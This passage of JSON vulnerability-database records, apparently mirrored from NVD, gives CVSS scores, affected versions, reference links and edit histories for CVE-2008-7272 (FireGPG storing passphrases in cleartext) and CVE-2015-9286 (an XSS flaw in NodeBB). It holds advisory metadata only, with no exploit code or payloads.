"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 2.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "hash": "feff88852d5f44ef4f736cb629de97022a0e3f23b99e0deec3d9ee5daaa7d8df", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "4847e3110691b6a6a4c7664c0f127f70", "key": "extraReferences"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2020-02-10T21:16:00", "objectVersion": "1.5", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 19}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-11-29T22:56:16", "references": [], "rev": 2}, "score": {"modified": "2020-11-29T22:56:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "20ae55db346f6babbeac989b07a5b26e855e45e42cfda6773d64bbcb84e4ef79", "hashmap": [{"hash": "d647e62c83e294ffd6f56a7c761beece", "key": "affectedSoftware"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-11-29T22:56:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 15}, "differentElements": ["affectedSoftware"], "edition": 6, "lastseen": "2020-11-29T22:56:16"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a0acab3127efc281e78e28b6a414532c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "77e03828e2d6f83f8fa932acfe8daff3"}, {"key": "cvelist", "hash": "767e67f900c3effb5b550959d21fb12e"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "cd391b15e7a01ae2bbfcca256d89bfb8"}, {"key": "cwe", "hash": "92c16862fafe4d9eb26185434339836e"}, {"key": "description", "hash": "95669953499c0eb40b242611dfbe75d4"}, {"key": "extraReferences", "hash": "4847e3110691b6a6a4c7664c0f127f70"}, {"key": "href", "hash": "9258b012e591cc93a7c6b0cd1b5c6b05"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "3c75b36a7f1966a251dbe6148b866f97"}, {"key": "published", "hash": "1162e82aa1c980ee7ebee4af4c99369c"}, {"key": "references", "hash": "54b0c94164bf625d039c58f14cd4c116"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5db042f8057f3f288fe9cd4213121eb2"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "f34f5d089606f7d870ccc28642bf61f774619d905673726848fc15f3a6590575", "viewCount": 25, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 2.4, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": [], "cwe": ["CWE-312"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "immutableFields": []}, {"id": "CVE-2015-9286", "bulletinFamily": "NVD", "title": "CVE-2015-9286", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "published": "2019-04-30T14:29:00", "modified": "2019-05-01T14:22:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "reporter": "cve@mitre.org", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "cvelist": ["CVE-2015-9286"], "type": "cve", "lastseen": "2021-04-22T23:51:50", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:21:32", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2021-02-02T06:21:32", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "hash": "e0413d958386f6534538918bca2249dcc4f383174e07b3bfd828fd87bab2fae7", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "db8254901fea804d4d910fc508c1be32", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "immutableFields": [], "lastseen": "2021-02-02T06:21:32", "modified": "2019-05-01T14:22:00", "objectVersion": "1.5", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 10}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:21:32"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:09:33", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-09-21T14:09:33", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "e856f7b9491cefcc50723678fc0433f12f7c6ae1abe16d206957fd00f74aa6e1", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-09-21T14:09:33", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 4}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:09:33"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-12-09T20:03:10", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-12-09T20:03:10", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [], "hash": "48b94d9acf0e692c61f3d939f819f0ddba91180b8a5c7286e7edbacc4207d0ed", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-12-09T20:03:10", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 6}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-12-09T20:03:10"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-11-30T00:13:43", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-11-30T00:13:43", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "6fe52c24d63e23f00822e673ee4063d867fb4719b46c47ea85a6bfe1400fe129", "hashmap": [{"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "71d5df73a226d76c990527e0ca95c8d8", "key": "affectedSoftware"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": 